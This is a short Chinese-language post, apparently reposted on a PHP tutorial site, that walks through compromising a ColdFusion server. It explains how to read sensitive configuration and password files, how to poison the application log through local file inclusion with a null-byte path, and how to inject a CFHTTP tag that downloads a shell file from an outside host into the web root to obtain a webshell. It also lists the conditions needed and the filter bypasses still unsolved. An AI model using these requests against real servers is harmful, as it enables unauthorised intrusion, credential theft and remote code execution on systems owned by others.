来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELLhttp://www.2cto.com/index.cfm?action=../......
1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码 2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL http://www.2cto.com /index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00
http://www.2cto.com /index.cfm?action=<CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>
http://www.2cto.com /index.cfm?action=..\..\..\CFusionMX7\logs\application.log%00&u=http://www.pentest.cc/shell.txt&p=c:\inetpub\wwwroot\&f=shell.cfm
成功条件: 1.WEB目录可写 2.coldfusion目录和web目录在同一个分区 3.多个牛人的群策群力 未解决的问题: 1.iis的日志会把空格变成+,不知道怎么绕过 2.coldfusion会把单引号和双引号加倍处理,不知道怎么绕过去(师傅也遇到这个问题了,哈哈) |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com